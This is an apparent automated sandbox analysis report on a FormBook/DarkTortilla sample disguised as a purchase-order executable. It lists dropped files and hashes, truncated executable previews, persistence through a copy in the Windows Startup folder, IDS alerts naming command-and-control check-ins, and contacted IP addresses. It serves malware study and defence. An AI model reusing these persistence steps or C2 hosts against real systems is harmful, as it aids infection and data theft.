                                                                                                                              SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exeGet hashmaliciousDarkTortillaBrowse
                                                                                                                                file.exeGet hashmaliciousDarkTortilla, PureLog Stealer, zgRATBrowse
                                                                                                                                  file.exeGet hashmaliciousPureCrypter, DarkTortilla, PureLog Stealer, zgRATBrowse
                                                                                                                                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                                                                                                                                      image.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                        file.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                                                          Approved_Invoice_0000384834.exeGet hashmaliciousDarkTortilla, RedLine, XWorm, zgRATBrowse
                                                                                                                                            po-544-8370.exeGet hashmaliciousDarkTortilla, RedLine, XWorm, zgRATBrowse

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO# 81136575.exe.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\PO# 81136575.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1378
                                                                                                                                              Entropy (8bit):5.375486659408667
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:MLU84qpE4K1BIKDE4KhKMaKha1qE4DL0E4KOKIE4oKnKoZAE4KzDq:Mgv2HK1BIYHKh6oa1qHDL0HKOtHoAhAL
                                                                                                                                              MD5:8937BBC55E228D182C2BF23EE8288C71
                                                                                                                                              SHA1:68E25407281760451ECED2F5BABD1E1D7128B48A
                                                                                                                                              SHA-256:2FDD2A49B18D4FCAEC52474B1452065F07A75A8ADA2D077F2A2A3911184DAC61
                                                                                                                                              SHA-512:BDB05C973807015F68F603A398C506D582A7438BC62EB082C86E6370A66D0C652F1DF82E598BCA65D0764B0C59CFDA34DCD0C81E863F45CE95DD9BE1A8F43926
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\9071a2976b2ef0ee49d0396431277b05\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ca77152be4cd7af9700becb268864b42\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Cu

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sages.exe.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1362
                                                                                                                                              Entropy (8bit):5.351667243172687
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ML9E4K1BIKDE4KhKMaKhuE4FJE4GulEE46t6AE4KIHcJ684j:MxHK1BIYHKh6ouHFJHTlEH63HKXAvj
                                                                                                                                              MD5:022535AB418BBE35D220F64C7E284C06
                                                                                                                                              SHA1:60466A399C6FDF4DCE024CF8F5E627D632DF5F7E
                                                                                                                                              SHA-256:EBDC941E0F3D86372ED1C23F49AA88E30244B1C54291688B4DB90C3EBB35890E
                                                                                                                                              SHA-512:DFD1857E3F1BAF23309B9262B268585893F7CD316C4197A5A090B89C7E75F8DC439879BC54C562AC6F8CCDDEC6839C40E16D1DF8125CC3178267089B1951C4D1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\52ec98467da21601034ee080a6de3215\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\4e8cc6067585c3a3a918b22c7f6271ba\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                                                                              C:\Users\user\AppData\Local\Temp\sages.exe

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):78336
                                                                                                                                              Entropy (8bit):4.369296705546591
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                                                                                                                              MD5:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                                                                                                                              SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                                                                                                                                              SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: image.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: Approved_Invoice_0000384834.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: po-544-8370.exe, Detection: malicious, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\sages.txt

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):99
                                                                                                                                              Entropy (8bit):4.825967546079359
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:kOvmWOONtkEaKC5SufyM1K/RFofD6tRQrLAdIqv:kA5OCNaZ5SuH1MUmt2r0dd
                                                                                                                                              MD5:DD5094E8230DD6AA2828282D62193DF6
                                                                                                                                              SHA1:953EC49D86713DB8BE5BE6572FCE5A8E20E73F5A
                                                                                                                                              SHA-256:CC16E3F4EA7F26D2A97CBDA311430F7BBD2672075BD633A2E595E0359AF896D3
                                                                                                                                              SHA-512:E6DEC7701FF10BE9C8C31FACA6507100BD5EA1D133656C9ABD9C748B70710AB241319DD344CB3283689F0C2CFFDDA2AC294FBD4E9A7B846849F351EDFF5374D7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:904..C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe..2128..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1565184
                                                                                                                                              Entropy (8bit):6.919411070401315
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:Mkc92psKAq6ITV5vGbao8LSEI28qSN961kqiwu4H4444C:MkcYaKd6EGbrs4qSOGN4H4444C
                                                                                                                                              MD5:B353674E16431A7424571790D4D58F71
                                                                                                                                              SHA1:EB356AC3D93BC0A61BD38929C3BDB46BBF6C1315
                                                                                                                                              SHA-256:1E474CDEEB0981210D4A74FD907BF35076BD839CDAED665BFCD6360557797895
                                                                                                                                              SHA-512:73FEDC917A39E32503E7DC559B16F583AF1C77E77E63321DA432C0210BAEE211ABE0AB24A2341B5B42AC9EA3CE49BC4A0D2610ECFA8482775564554763857E3F
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G............."...P.................. ........@.. .......................@............`.................................d...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......\.......................................................................m..;..Fni...0K`..( ...*&..(!....*.s"........s#........s$........s%........s&........*Z........o9...........*&..(:....*j..{....(...+}.....{....+.*...{......,.+.....,.rq..ps?...z..|....(...+*&........*".......*Vs#...(D...t.........*..(E...*..(:...*..sK...z&.{....+.*6..(;...}....*...{.....r[..p..........(H...&.(*....rs..p..........(H...&*...(*....r...p.........(F....r...p......%...^........(I....*..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe:Zone.Identifier

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):26
                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnk

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\PO# 81136575.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1398
                                                                                                                                              Entropy (8bit):2.9927747434080865
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:8YrWLgD4/BOmRC87q8MSvxyjCyjMH6d0+JT:8FgDsvRC87tMS0CyjMHqT
                                                                                                                                              MD5:9A42D7AD03DB81339F3D1270D20243A0
                                                                                                                                              SHA1:4FB135D4AECA5DA07D816EC7D61B39CCBD6D8D33
                                                                                                                                              SHA-256:240E68D079D37089705AEF9435E2BBD1596FA945C2B48AE5FDA4FF7AF27ACFA3
                                                                                                                                              SHA-512:BD1B3E13A7F52C9B7014AD94CF1FE0D841EB5C4954F129D02ED53B05051939C8AAEB44CF15E6FD2FC09457D7394FBFECCCB4D5FA5F53E3A78AECC3F166640D1B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.....Z.1...........Programs..B............................................P.r.o.g.r.a.m.s.....V.1...........Startup.@............................................S.t.a.r.t.u.p.....Z.2...........sage.exe..B............................................s.a.g.e...e.x.e......

                                                                                                                                              \Device\Null

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2636
                                                                                                                                              Entropy (8bit):4.717623141423379
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTx:/ygGWEAokItULVDv
                                                                                                                                              MD5:6E3E756DF1EFD0768ADBB6812A348CF5
                                                                                                                                              SHA1:787F0C3B4A3D8C925F0CCAF20C15AF017FE4B9AC
                                                                                                                                              SHA-256:34981498D18865EE8F80E1F8F8F52706CE4ED88C795BFD9C71A4A6B17306F91D
                                                                                                                                              SHA-512:5D0B21074104C8999CD898CFE5457A29762FCEF0D47652CD5F79A065F9C0636A976A8EBDA4DCB149C74D0E3E59FE6EB33C5A645AC1E05C200580087604827DC4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Entropy (8bit):6.919411070401315
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                              File name:PO# 81136575.exe
                                                                                                                                              File size:1'565'184 bytes
                                                                                                                                              MD5:b353674e16431a7424571790d4d58f71
                                                                                                                                              SHA1:eb356ac3d93bc0a61bd38929c3bdb46bbf6c1315
                                                                                                                                              SHA256:1e474cdeeb0981210d4a74fd907bf35076bd839cdaed665bfcd6360557797895
                                                                                                                                              SHA512:73fedc917a39e32503e7dc559b16f583af1c77e77e63321da432c0210baee211abe0ab24a2341b5b42ac9ea3ce49bc4a0d2610ecfa8482775564554763857e3f
                                                                                                                                              SSDEEP:24576:Mkc92psKAq6ITV5vGbao8LSEI28qSN961kqiwu4H4444C:MkcYaKd6EGbrs4qSOGN4H4444C
                                                                                                                                              TLSH:2575AE002BE91964F3FA3EB89FB999568637FCE15832C65E043015CE4672B81ED62737
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G............."...P.................. ........@.. .......................@............`................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:98306e8c8cb6828c

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x56eebe
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x1283FA47 [Mon Nov 5 08:39:35 1979 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:4
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:4
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:4
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x16ee640x57.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1700000x10cf0.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1820000xc.reloc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x20000x16cec40x16d000af9c0355933fc931219da8c551a5aa3eFalse0.7365080532962329data7.089199817727075IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rsrc0x1700000x10cf00x10e009fc3825c990d6ecbc5b75691b4186ddaFalse0.052300347222222224data1.3837080703783768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .reloc0x1820000xc0x200d58dc0d75b1a43a80274fb4964d2560bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                              RT_ICON0x1700e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.045353720572577784
                                                                                                                                              RT_GROUP_ICON0x1809100x14data1.25
                                                                                                                                              RT_VERSION0x1809240x3ccdata0.43930041152263377

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                              Network Behavior

                                                                                                                                              Suricata IDS Alerts

                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-11-28T18:56:51.299445+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049715172.67.149.5380TCP
                                                                                                                                              2024-11-28T18:57:16.148350+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049719217.70.184.5080TCP
                                                                                                                                              2024-11-28T18:57:30.197189+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204972343.153.84.19080TCP
                                                                                                                                              2024-11-28T18:57:44.673982+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204972723.225.34.7580TCP
                                                                                                                                              2024-11-28T18:57:58.403418+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049731104.21.53.9380TCP
                                                                                                                                              2024-11-28T18:58:12.156845+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204973513.248.169.4880TCP
                                                                                                                                              2024-11-28T18:58:26.762980+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049739161.97.168.24580TCP
                                                                                                                                              2024-11-28T19:00:35.727456+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204974484.32.84.3280TCP
                                                                                                                                              2024-11-28T19:00:50.833474+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049748208.91.197.2780TCP
                                                                                                                                              2024-11-28T19:01:05.738803+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049752172.247.159.6880TCP
                                                                                                                                              2024-11-28T19:01:20.102885+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049756172.172.168.24080TCP
                                                                                                                                              2024-11-28T19:01:34.500064+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204976038.47.207.12080TCP
                                                                                                                                              2024-11-28T19:01:48.567273+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049764192.185.16.20980TCP
                                                                                                                                              2024-11-28T19:02:13.153245+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049765172.67.149.5380TCP
                                                                                                                                              2024-11-28T19:02:27.284955+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049769217.70.184.5080TCP

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Nov 28, 2024 18:56:48.874042988 CET4971580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 18:56:49.030570030 CET8049715172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 18:56:49.030745029 CET4971580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 18:56:49.036932945 CET4971580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 18:56:49.193160057 CET8049715172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 18:56:51.298477888 CET8049715172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 18:56:51.299273968 CET8049715172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 18:56:51.299444914 CET4971580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 18:56:51.301706076 CET4971580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 18:56:51.458023071 CET8049715172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:07.014338970 CET4971680192.168.11.20217.70.184.50
